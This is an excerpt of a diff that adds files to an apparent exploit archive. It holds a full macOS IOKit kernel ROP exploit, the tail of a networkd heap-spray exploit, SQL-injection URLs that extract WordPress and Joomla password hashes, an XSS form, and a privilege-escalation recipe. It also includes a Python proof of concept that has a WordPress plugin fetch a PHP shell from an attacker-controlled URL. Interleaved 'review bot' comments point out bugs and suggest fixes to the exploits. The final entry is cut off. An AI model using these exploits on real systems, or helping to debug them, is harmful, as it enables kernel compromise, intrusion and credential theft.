hs->fake_objc_class_ptr = &hs->fake_objc_class;
|
||||
hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
|
||||
hs->fake_objc_class.cache_bucket_mask = 0;
|
||||
|
||||
// nasty hack to find the correct selector address :)
|
||||
uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
|
||||
uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector
|
||||
uint64_t sel = msgrefs[1];
|
||||
printf("%p\n", sel);
|
||||
hs->fake_cache_bucket.cached_sel = sel;
|
||||
|
||||
uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
|
||||
// pivot:
|
||||
/*
|
||||
push rax
|
||||
add eax, [rax]
|
||||
add [rbx+0x41], bl
|
||||
pop rsp
|
||||
pop r14
|
||||
pop r15
|
||||
pop rbp
|
||||
ret
|
||||
*/
|
||||
hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here
|
||||
|
||||
// jump over the NULL then so there's more space:
|
||||
//pop, pop, pop, ret: //and keep stack correctly aligned
|
||||
hs->first_gadget = CoreFoundation_base + 0x46ef7;
|
||||
|
||||
hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226;
|
||||
hs->system = dlsym(RTLD_DEFAULT, "system");
|
||||
|
||||
hs->rdi = &hs->command;
|
||||
strcpy(hs->command, "touch /tmp/hello_networkd");
|
||||
|
||||
|
||||
size_t heap_spray_pages = 0x40000;
|
||||
size_t heap_spray_bytes = heap_spray_pages * 0x1000;
|
||||
char* heap_spray_copies = malloc(heap_spray_bytes);
|
||||
for (int i = 0; i < heap_spray_pages; i++){
|
||||
memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000);
|
||||
}
|
||||
|
||||
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
|
||||
|
||||
xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);
|
||||
|
||||
xpc_dictionary_set_uint64(msg, "type", 6);
|
||||
xpc_dictionary_set_uint64(msg, "connection_id", 1);
|
||||
|
||||
xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0);
|
||||
xpc_object_t conn_list = xpc_array_create(NULL, 0);
|
||||
|
||||
xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0);
|
||||
xpc_dictionary_set_string(arr_dict, "hostname", "example.com");
|
||||
|
||||
xpc_array_append_value(conn_list, arr_dict);
|
||||
xpc_dictionary_set_value(params, "connection_entry_list", conn_list);
|
||||
|
||||
char* long_key = malloc(1024);
|
||||
memset(long_key, 'A', 1023);
|
||||
long_key[1023] = '\x00';
|
||||
|
||||
xpc_dictionary_set_string(params, long_key, "something or other that's not important");
|
||||
|
||||
uint64_t uuid[] = {0, 0x120200000};
|
||||
xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid);
|
||||
xpc_dictionary_set_uint64(params, "start", 0);
|
||||
xpc_dictionary_set_uint64(params, "duration", 0);
|
||||
|
||||
xpc_dictionary_set_value(msg, "parameters", params);
|
||||
|
||||
xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0);
|
||||
xpc_dictionary_set_int64(state, "power_slot", 0);
|
||||
xpc_dictionary_set_value(msg, "state", state);
|
||||
|
||||
xpc_object_t conn = connect();
|
||||
printf("connected\n");
|
||||
|
||||
xpc_connection_send_message(conn, msg);
|
||||
printf("enqueued message\n");
|
||||
|
||||
xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");});
|
||||
|
||||
xpc_release(msg);
|
||||
}
|
||||
|
||||
int main(){
|
||||
go();
|
||||
printf("entering CFRunLoop\n");
|
||||
for(;;){
|
||||
CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
323
platforms/osx/local/35848.c
Executable file
323
platforms/osx/local/35848.c
Executable file
|
@ -0,0 +1,323 @@
|
|||
// clang -o ig_2_3_exploit ig_2_3_exploit.c -framework IOKit -framework CoreFoundation -m32 -D_FORTIFY_SOURCE=0
|
||||
// ianbeer
|
||||
#include <stdint.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/stat.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#include <CoreFoundation/CoreFoundation.h>
|
||||
#include <IOKit/IOKitLib.h>
|
||||
|
||||
uint64_t kernel_symbol(char* sym){
|
||||
char cmd[1024];
|
||||
strcpy(cmd, "nm -g /mach_kernel | grep ");
|
||||
strcat(cmd, sym);
|
||||
strcat(cmd, " | cut -d' ' -f1");
|
||||
FILE* f = popen(cmd, "r");
|
||||
char offset_str[17];
|
||||
fread(offset_str, 16, 1, f);
|
||||
pclose(f);
|
||||
offset_str[16] = '\x00';
|
||||
|
||||
uint64_t offset = strtoull(offset_str, NULL, 16);
|
||||
return offset;
|
||||
}
|
||||
|
||||
uint64_t leaked_offset_in_kext(){
|
||||
FILE* f = popen("nm -g /System/Library/Extensions/IONDRVSupport.kext/IONDRVSupport | grep __ZTV17IONDRVFramebuffer | cut -d' ' -f1", "r");
|
||||
char offset_str[17];
|
||||
fread(offset_str, 16, 1, f);
|
||||
pclose(f);
|
||||
offset_str[16] = '\x00';
|
||||
|
||||
uint64_t offset = strtoull(offset_str, NULL, 16);
|
||||
offset += 0x10; //offset from symbol to leaked pointer
|
||||
return offset;
|
||||
}
|
||||
|
||||
|
||||
uint64_t leak(){
|
||||
io_iterator_t iter;
|
||||
|
||||
CFTypeRef p = IORegistryEntrySearchCFProperty(IORegistryGetRootEntry(kIOMasterPortDefault),
|
||||
kIOServicePlane,
|
||||
CFSTR("AAPL,iokit-ndrv"),
|
||||
kCFAllocatorDefault,
|
||||
kIORegistryIterateRecursively);
|
||||
|
||||
if (CFGetTypeID(p) != CFDataGetTypeID()){
|
||||
printf("expected CFData\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
if (CFDataGetLength(p) != 8){
|
||||
printf("expected 8 bytes\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
uint64_t leaked = *((uint64_t*)CFDataGetBytePtr(p));
|
||||
return leaked;
|
||||
}
|
||||
|
||||
extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);
|
||||
|
||||
uint64_t kext_load_addr(char* target_name){
|
||||
uint64_t addr = 0;
|
||||
CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
|
||||
CFIndex count = CFDictionaryGetCount(kd);
|
||||
|
||||
void **keys;
|
||||
void **values;
|
||||
|
||||
keys = (void **)malloc(sizeof(void *) * count);
|
||||
values = (void **)malloc(sizeof(void *) * count);
|
||||
|
||||
CFDictionaryGetKeysAndValues(kd,
|
||||
(const void **)keys,
|
||||
(const void **)values);
|
||||
|
||||
for(CFIndex i = 0; i < count; i++){
|
||||
const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
|
||||
if (strcmp(name, target_name) == 0){
|
||||
CFNumberGetValue(CFDictionaryGetValue(values[i],
|
||||
CFSTR("OSBundleLoadAddress")),
|
||||
kCFNumberSInt64Type,
|
||||
&addr);
|
||||
printf("%s: 0x%016llx\n", name, addr);
|
||||
break;
|
||||
}
|
||||
}
|
||||
return addr;
|
||||
|
||||
}
|
||||
|
||||
uint64_t load_addr(){
|
||||
uint64_t addr = 0;
|
||||
CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
|
||||
CFIndex count = CFDictionaryGetCount(kd);
|
||||
|
||||
void **keys;
|
||||
void **values;
|
||||
|
||||
keys = (void **)malloc(sizeof(void *) * count);
|
||||
values = (void **)malloc(sizeof(void *) * count);
|
||||
|
||||
CFDictionaryGetKeysAndValues(kd,
|
||||
(const void **)keys,
|
||||
(const void **)values);
|
||||
|
||||
for(CFIndex i = 0; i < count; i++){
|
||||
const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
|
||||
if (strcmp(name, "com.apple.iokit.IONDRVSupport") == 0){
|
||||
CFNumberGetValue(CFDictionaryGetValue(values[i],
|
||||
CFSTR("OSBundleLoadAddress")),
|
||||
kCFNumberSInt64Type,
|
||||
&addr);
|
||||
printf("%s: 0x%016llx\n", name, addr);
|
||||
break;
|
||||
}
|
||||
}
|
||||
return addr;
|
||||
}
|
||||
|
||||
uint64_t* build_vtable(uint64_t kaslr_slide, size_t* len){
|
||||
uint64_t kernel_base = 0xffffff8000200000;
|
||||
kernel_base += kaslr_slide;
|
||||
|
||||
int fd = open("/mach_kernel", O_RDONLY);
|
||||
if (!fd)
|
||||
return NULL;
|
||||
|
||||
struct stat _stat;
|
||||
fstat(fd, &_stat);
|
||||
size_t buf_len = _stat.st_size;
|
||||
|
||||
uint8_t* buf = mmap(NULL, buf_len, PROT_READ, MAP_FILE|MAP_PRIVATE, fd, 0);
|
||||
|
||||
if (!buf)
|
||||
return NULL;
|
||||
|
||||
/*
|
||||
this stack pivot to rax seems to be reliably present across mavericks versions:
|
||||
push rax
|
||||
add [rax], eax
|
||||
add [rbx+0x41], bl
|
||||
pop rsp
|
||||
pop r14
|
||||
pop r15
|
||||
pop rbp
|
||||
ret
|
||||
*/
|
||||
uint8_t pivot_gadget_bytes[] = {0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e};
|
||||
uint8_t* pivot_loc = memmem(buf, buf_len, pivot_gadget_bytes, sizeof(pivot_gadget_bytes));
|
||||
uint64_t pivot_gadget_offset = (uint64_t)(pivot_loc - buf);
|
||||
printf("offset of pivot gadget: %p\n", pivot_gadget_offset);
|
||||
uint64_t pivot = kernel_base + pivot_gadget_offset;
|
||||
|
||||
/*
|
||||
pop rdi
|
||||
ret
|
||||
*/
|
||||
uint8_t pop_rdi_ret_gadget_bytes[] = {0x5f, 0xc3};
|
||||
uint8_t* pop_rdi_ret_loc = memmem(buf, buf_len, pop_rdi_ret_gadget_bytes, sizeof(pop_rdi_ret_gadget_bytes));
|
||||
uint64_t pop_rdi_ret_gadget_offset = (uint64_t)(pop_rdi_ret_loc - buf);
|
||||
printf("offset of pop_rdi_ret gadget: %p\n", pop_rdi_ret_gadget_offset);
|
||||
uint64_t pop_rdi_ret = kernel_base + pop_rdi_ret_gadget_offset;
|
||||
|
||||
/*
|
||||
pop rsi
|
||||
ret
|
||||
*/
|
||||
uint8_t pop_rsi_ret_gadget_bytes[] = {0x5e, 0xc3};
|
||||
uint8_t* pop_rsi_ret_loc = memmem(buf, buf_len, pop_rsi_ret_gadget_bytes, sizeof(pop_rsi_ret_gadget_bytes));
|
||||
uint64_t pop_rsi_ret_gadget_offset = (uint64_t)(pop_rsi_ret_loc - buf);
|
||||
printf("offset of pop_rsi_ret gadget: %p\n", pop_rsi_ret_gadget_offset);
|
||||
uint64_t pop_rsi_ret = kernel_base + pop_rsi_ret_gadget_offset;
|
||||
|
||||
/*
|
||||
pop rdx
|
||||
ret
|
||||
*/
|
||||
uint8_t pop_rdx_ret_gadget_bytes[] = {0x5a, 0xc3};
|
||||
uint8_t* pop_rdx_ret_loc = memmem(buf, buf_len, pop_rdx_ret_gadget_bytes, sizeof(pop_rdx_ret_gadget_bytes));
|
||||
uint64_t pop_rdx_ret_gadget_offset = (uint64_t)(pop_rdx_ret_loc - buf);
|
||||
printf("offset of pop_rdx_ret gadget: %p\n", pop_rdx_ret_gadget_offset);
|
||||
uint64_t pop_rdx_ret = kernel_base + pop_rdx_ret_gadget_offset;
|
||||
|
||||
munmap(buf, buf_len);
|
||||
close(fd);
|
||||
|
||||
|
||||
/*
|
||||
in IOAcceleratorFamily2
|
||||
two locks are held - r12 survives the pivot, this should unlock all the locks from there:
|
||||
__text:0000000000006F80 lea rsi, unk_32223
|
||||
__text:0000000000006F87 mov rbx, [r12+118h]
|
||||
__text:0000000000006F8F mov rax, [rbx]
|
||||
__text:0000000000006F92 mov rdi, rbx
|
||||
__text:0000000000006F95 xor edx, edx
|
||||
__text:0000000000006F97 call qword ptr [rax+858h]
|
||||
__text:0000000000006F9D mov rdi, rbx ; this
|
||||
__text:0000000000006FA0 call __ZN22IOGraphicsAccelerator211unlock_busyEv ; IOGraphicsAccelerator2::unlock_busy(void)
|
||||
__text:0000000000006FA5 mov rdi, [rbx+88h]
|
||||
__text:0000000000006FAC call _IOLockUnlock
|
||||
__text:0000000000006FB1
|
||||
__text:0000000000006FB1 loc_6FB1: ; CODE XREF: IOAccelContext2::clientMemoryForType(uint,uint *,IOMemoryDescriptor **)+650j
|
||||
__text:0000000000006FB1 xor ecx, ecx
|
||||
__text:0000000000006FB3 jmp loc_68BC
|
||||
...
|
||||
__text:00000000000068BC mov eax, ecx ; jumptable 00000000000067F1 default case
|
||||
__text:00000000000068BE add rsp, 38h
|
||||
__text:00000000000068C2 pop rbx
|
||||
__text:00000000000068C3 pop r12
|
||||
__text:00000000000068C5 pop r13
|
||||
__text:00000000000068C7 pop r14
|
||||
__text:00000000000068C9 pop r15
|
||||
__text:00000000000068CB pop rbp
|
||||
__text:00000000000068CC retn
|
||||
*/
|
||||
uint64_t unlock_locks = kext_load_addr("com.apple.iokit.IOAcceleratorFamily2") + kaslr_slide + 0x6f80;
|
||||
|
||||
printf("0x%016llx\n", unlock_locks);
|
||||
|
||||
uint64_t KUNCExecute = kernel_symbol("_KUNCExecute") + kaslr_slide;
|
||||
uint64_t thread_exception_return = kernel_symbol("_thread_exception_return") + kaslr_slide;
|
||||
|
||||
//char* payload = "/Applications/Calculator.app/Contents/MacOS/Calculator";
|
||||
char* payload = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal";
|
||||
|
||||
uint64_t rop_stack[] = {
|
||||
0, //pop r14
|
||||
0, //pop r15
|
||||
0, //pop rbp +10
|
||||
unlock_locks,
|
||||
pivot, //+20 virtual call is rax+20
|
||||
0, //+10
|
||||
0, //+18
|
||||
0,
|
||||
0, //+28
|
||||
0,
|
||||
0, //+38
|
||||
0, //pop rbx
|
||||
0, //pop r12
|
||||
0, //pop r13
|
||||
0, //pop r14
|
||||
0, //pop r15
|
||||
0, //pop rbp
|
||||
pop_rdi_ret,
|
||||
(uint64_t)payload,
|
||||
pop_rsi_ret,
|
||||
0,
|
||||
pop_rdx_ret,
|
||||
0,
|
||||
KUNCExecute,
|
||||
thread_exception_return
|
||||
};
|
||||
|
||||
uint64_t* r = malloc(sizeof(rop_stack));
|
||||
memcpy(r, rop_stack, sizeof(rop_stack));
|
||||
*len = sizeof(rop_stack);
|
||||
return r;
|
||||
}
|
||||
|
||||
void trigger(void* vtable, size_t vtable_len){
|
||||
//need to overallocate and touch the pages since this will be the stack:
|
||||
mach_vm_address_t addr = 0x41420000 - 10 * 0x1000;
|
||||
mach_vm_allocate(mach_task_self(), &addr, 0x20*0x1000, 0);
|
||||
|
||||
memset(addr, 0, 0x20*0x1000);
|
||||
memcpy((void*)0x41420000, vtable, vtable_len);
|
||||
|
||||
//map NULL page
|
||||
vm_deallocate(mach_task_self(), 0x0, 0x1000);
|
||||
addr = 0;
|
||||
vm_allocate(mach_task_self(), &addr, 0x1000, 0);
|
||||
char* np = 0;
|
||||
for (int i = 0; i < 0x1000; i++){
|
||||
np[i] = 'A';
|
||||
}
|
||||
|
||||
volatile uint64_t* zero = 0;
|
||||
*zero = 0x41420000;
|
||||
|
||||
//trigger vuln
|
||||
CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
|
||||
io_iterator_t iterator;
|
||||
kern_return_t err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
|
||||
|
||||
io_service_t service = IOIteratorNext(iterator);
|
||||
io_connect_t conn = MACH_PORT_NULL;
|
||||
err = IOServiceOpen(service, mach_task_self(), 2, &conn);
|
||||
|
||||
addr = 0x12345000;
|
||||
mach_vm_size_t size = 0x1000;
|
||||
|
||||
err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
|
||||
}
|
||||
|
||||
int main() {
|
||||
uint64_t leaked_ptr = leak();
|
||||
uint64_t kext_load_addr = load_addr();
|
||||
|
||||
// get the offset of that pointer in the kext:
|
||||
uint64_t offset = leaked_offset_in_kext();
|
||||
|
||||
// sanity check the leaked address against the symbol addr:
|
||||
if ( (leaked_ptr & 0xfff) != (offset & 0xfff) ){
|
||||
printf("the leaked pointer doesn't match up with the expected symbol offset\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
uint64_t kaslr_slide = (leaked_ptr - offset) - kext_load_addr;
|
||||
|
||||
printf("kaslr slide: %p\n", kaslr_slide);
|
||||
|
||||
size_t vtable_len = 0;
|
||||
void* vtable = build_vtable(kaslr_slide, &vtable_len);
|
||||
|
||||
trigger(vtable, vtable_len);
|
||||
|
||||
return 0;
|
||||
}
|
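Review bot: The error checks in `build_vtable` test the wrong sentinel: `open()` returns -1 on failure (0 is a valid descriptor) and `mmap()` returns `MAP_FAILED`, so `if (!fd)` and `if (!buf)` never fire, and the four `memmem()` results are subtracted from `buf` without a NULL check, which turns a missing byte pattern into a garbage offset instead of a diagnostic. `if (fd < 0) return NULL;` and `if (buf == MAP_FAILED) { close(fd); return NULL; }` are the intended guards, and the descriptor is currently leaked on the early-return path. `load_addr` is a verbatim copy of `kext_load_addr` with the bundle id inlined; both leak `keys`, `values` and the `kd` dictionary (no `free`/`CFRelease`), and pass the result of `CFStringGetCStringPtr`, which may be NULL, straight to `strcmp`. `leak()` returns 1 as its error value, which `main` cannot tell apart from a leaked pointer, and `printf` is given `uint64_t` values for `%p` in several places. `<fcntl.h>` and `<string.h>` are not included although `O_RDONLY`, `strcpy` and `memmem` are used.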
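--- a/platforms/php/remote/35855.txt
+++ b/platforms/php/remote/35855.txt
@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/48259/info
+
+PHP is prone to a security-bypass vulnerability.
+
+Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks.
+
+PHP 5.3.6 is vulnerable; other versions may also be affected.
+
+HTTP Request:
+====
+POST /file-upload-fuzz/recv_dump.php HTTP/1.0
+host: blog.security.localhost
+content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
+content-length: 200
+
+------------ThIs_Is_tHe_bouNdaRY_$
+Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
+Content-Type: text/plain
+
+any
+------------ThIs_Is_tHe_bouNdaRY_$--
+
+HTTP Response:
+====
+HTTP/1.1 200 OK
+Date: Fri, 27 May 2011 11:35:08 GMT
+Server: Apache/2.2.14 (Ubuntu)
+X-Powered-By: PHP/5.3.2-1ubuntu4.9
+Content-Length: 30
+Connection: close
+Content-Type: text/html
+
+/anything.here.slash-will-pass
+
+PHP script:
+=====
+<?php
+if (!empty($_FILES['contents'])) { // process file upload
+echo $_FILES['contents']['name'];
+unlink($_FILES['contents']['tmp_name']);
+}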
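Review bot: The harness script at the end echoes `$_FILES['contents']['name']` unescaped, and the advisory's own point is that this value is client-controlled, so the PoC is itself a reflected-XSS sink; `echo htmlspecialchars($_FILES['contents']['name'], ENT_QUOTES, 'UTF-8');` keeps the demonstration while showing the safe form. A comment next to the script should state the defensive takeaway: the uploaded `name` must never be used as a path (reduce it with `basename()` and validate against an allowlist before any filesystem call), and `unlink()`/`move_uploaded_file()` should be gated on `is_uploaded_file($_FILES['contents']['tmp_name'])`.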
8
platforms/php/webapps/35835.txt
Executable file
8
platforms/php/webapps/35835.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/48166/info
|
||||
|
||||
The GD Star Rating plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,co
|
||||
ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1
|
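--- a/platforms/php/webapps/35837.html
+++ b/platforms/php/webapps/35837.html
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/48215/info
+
+
+The Pacer Edition CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The Pacer Edition CMS RC 2.1 is vulnerable; prior versions may also be affected.
+
+<html>
+<title>Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability</title>
+<body bgcolor="#1C1C1C">
+<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
+<form action="http://www.example.com/admin/login/forgot/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
+<input type="hidden" name="url" value="1" />
+<input type="hidden" name="email" value='%F6"+onmouseover=prompt(31337)' />
+<input type="hidden" name="button" value="Send%20Details" />
+</form>
+<a href="javascript: xss1();" style="text-decoration:none">
+<b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a>
+</body>
+</html>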
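--- a/platforms/php/webapps/35838.txt
+++ b/platforms/php/webapps/35838.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48217/info
+
+Tolinet Agencia is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?tip=art&id=2' <- blind sql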
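--- a/platforms/php/webapps/35839.txt
+++ b/platforms/php/webapps/35839.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48223/info
+
+Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--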
62
platforms/php/webapps/35840.txt
Executable file
62
platforms/php/webapps/35840.txt
Executable file
|
@ -0,0 +1,62 @@
|
|||
???# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
|
||||
# Date: 11-05-2014
|
||||
# Exploit Author: shyamkumar somana
|
||||
# Vendor Homepage: http://redaxscript.com/
|
||||
# Version: 2.1.0
|
||||
# Tested on: Windows 8
|
||||
|
||||
#Privilege Escalation in RedaxScript 2.1.0
|
||||
|
||||
|
||||
RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The
|
||||
issue occurs because the application fails to properly implement access
|
||||
controls. The application also fails to perform proper sanity checks on the
|
||||
user supplied input before processing it. These two flaws led to a
|
||||
vertical privilege escalation. This can be achieved by a simply tampering
|
||||
the parameter values. An attacker can exploit this issue to gain elevated
|
||||
privileges to the application.
|
||||
|
||||
*Steps to reproduce the instance:*
|
||||
|
||||
· login as a non admin user
|
||||
|
||||
· Go to account and update the account.
|
||||
|
||||
· intercept the request and add “*groups[]=1*” to the post data and
|
||||
submit the request
|
||||
|
||||
· Log out of the application and log in again. You can now browse
|
||||
the application with admin privileges.
|
||||
|
||||
This vulnerability was addressed in the following commit.
|
||||
|
||||
https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified
|
||||
|
||||
|
||||
*Timeline*:
|
||||
|
||||
09-26-2014: Issue identified
|
||||
|
||||
09-27-2014: Discussion with the vendor
|
||||
|
||||
10-27-2014: Issue confirmed
|
||||
|
||||
11-05-2014: Patch released.
|
||||
|
||||
|
||||
|
||||
|
||||
Author: Shyamkumar Somana
|
||||
Vendor Homepage: http://redaxscript.com/download
|
||||
Version: 2.1.0
|
||||
Tested on: Windows 7
|
||||
|
||||
--
|
||||
|
||||
[image: --]
|
||||
shyam kumar
|
||||
[image: http://]about.me/shyamkumar.somana
|
||||
<http://about.me/shyamkumar.somana?promo=email_sig>
|
||||
|
||||
Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam |
|
||||
in.linkedin.com/in/sshyamkumar/ |
|
118
platforms/php/webapps/35846.txt
Executable file
118
platforms/php/webapps/35846.txt
Executable file
|
@ -0,0 +1,118 @@
|
|||
Mogwai Security Advisory MSA-2015-01
|
||||
----------------------------------------------------------------------
|
||||
Title: WP Pixarbay Images Multiple Vulnerabilities
|
||||
Product: Pixarbay Images (Wordpress Plugin)
|
||||
Affected versions: 2.3
|
||||
Impact: high
|
||||
Remote: yes
|
||||
Product link: https://wordpress.org/plugins/pixabay-images/
|
||||
Reported: 14/01/2015
|
||||
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
|
||||
|
||||
|
||||
Vendor's Description of the Software:
|
||||
----------------------------------------------------------------------
|
||||
Pixabay Images is a WordPress plugin that let's you pick CC0 public
|
||||
domain pictures from Pixabay and insert them with just a click anywhere
|
||||
on your blog. The images are safe to use, and paying attribution or
|
||||
linking back to the source is not required.
|
||||
|
||||
|
||||
Business recommendation:
|
||||
----------------------------------------------------------------------
|
||||
Update to version 2.4
|
||||
|
||||
Vulnerability description:
|
||||
----------------------------------------------------------------------
|
||||
1) Authentication bypass
|
||||
The plugin does not correctly check if the user is logged in. Certain
|
||||
code can be called without authentication
|
||||
|
||||
2) Arbitrary file upload
|
||||
The plugin code does not validate the host in the provided download URL,
|
||||
which allows to upload malicious files, including PHP code.
|
||||
|
||||
3) Path Traversal
|
||||
Certain values are not sanitized before they are used in a file operation.
|
||||
This allows to store files outside of the "download" folder.
|
||||
|
||||
4) Cross Site Scripting (XSS)
|
||||
The generated author link uses unsanitized user values which can be
|
||||
abused for Cross Site Scripting (XSS) attacks.
|
||||
|
||||
|
||||
Proof of concept:
|
||||
----------------------------------------------------------------------
|
||||
The following PoC Python script can be used to download PHP files from
|
||||
a attacker controlled host.
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
import argparse
|
||||
import httplib, urllib
|
||||
from urlparse import urlparse
|
||||
|
||||
def exploit(target_url, shellcode_url):
|
||||
|
||||
target = urlparse(target_url)
|
||||
|
||||
params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
|
||||
'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
|
||||
headers = headers = {"Content-type": "application/x-www-form-urlencoded"}
|
||||
|
||||
print "[+] Sending download request...."
|
||||
conn = httplib.HTTPConnection(target.netloc)
|
||||
conn.request("POST", target.path + "/wp-admin/", params, headers)
|
||||
|
||||
response = conn.getresponse()
|
||||
response_data = response.read()
|
||||
if response.status != 200 and response_data != "Error: File attachment metadata
|
||||
error":
|
||||
print "[-] Something went wrong"
|
||||
print response_data
|
||||
exit()
|
||||
|
||||
conn.close()
|
||||
|
||||
|
||||
# ---- Main code ----------------
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("target_url", help="The target url, for example
|
||||
http://foo.bar/blog/")
|
||||
parser.add_argument("shellcode_url", help="The url of the PHP file that should
|
||||
be uploaded, for example: http://attacker.com/shell.php")
|
||||
|
||||
print "----------------------------------------------"
|
||||
print " pixabay upload wordpress plugin exploit PoC"
|
||||
print " Mogwai security"
|
||||
print "----------------------------------------------"
|
||||
|
||||
arguments = parser.parse_args()
|
||||
exploit(arguments.target_url, arguments.shellcode_url)
|
||||
|
||||
|
||||
|
||||
|
||||
Vulnerable / tested versions:
|
||||
----------------------------------------------------------------------
|
||||
Pixabay Images 2.3
|
||||
|
||||
|
||||
Disclosure timeline:
|
||||
----------------------------------------------------------------------
|
||||
14/01/2014: Reporting issues to the plugin author
|
||||
15/01/2014: Release of fixed version (2.4)
|
||||
19/01/2014: Public advisory
|
||||
|
||||
|
||||
Advisory URL:
|
||||
----------------------------------------------------------------------
|
||||
https://www.mogwaisecurity.de/#lab
|
||||
|
||||
|
||||
----------------------------------------------------------------------
|
||||
Mogwai, IT-Sicherheitsberatung Muench
|
||||
Steinhoevelstrasse 2/2
|
||||
89075 Ulm (Germany)
|
||||
|
||||
info@mogwaisecurity.de
|
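Review bot: The success test in `exploit()` is inverted: `response.status != 200 and response_data != "..."` treats any non-200 reply that happens to carry the expected error text as success and a 200 with a different body as failure; from the message printed below it the author appears to mean `if response.status != 200 or response_data != "Error: File attachment metadata error":`. `headers = headers = {...}` is a duplicated assignment, `exit()` on the error path skips `conn.close()`, and the script is Python 2 only (`httplib`, `urllib.urlencode`, print statements), which the header comment should state. The `response_data` string is wrapped across two lines on this page, so confirm against the raw file before changing it.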
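--- a/platforms/php/webapps/35851.txt
+++ b/platforms/php/webapps/35851.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/48233/info
+
+WebFileExplorer is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+WebFileExplorer 3.6 is vulnerable; other versions may also be affected.
+
+Supplying the following input to the username or password field is sufficient to exploit these issues:
+
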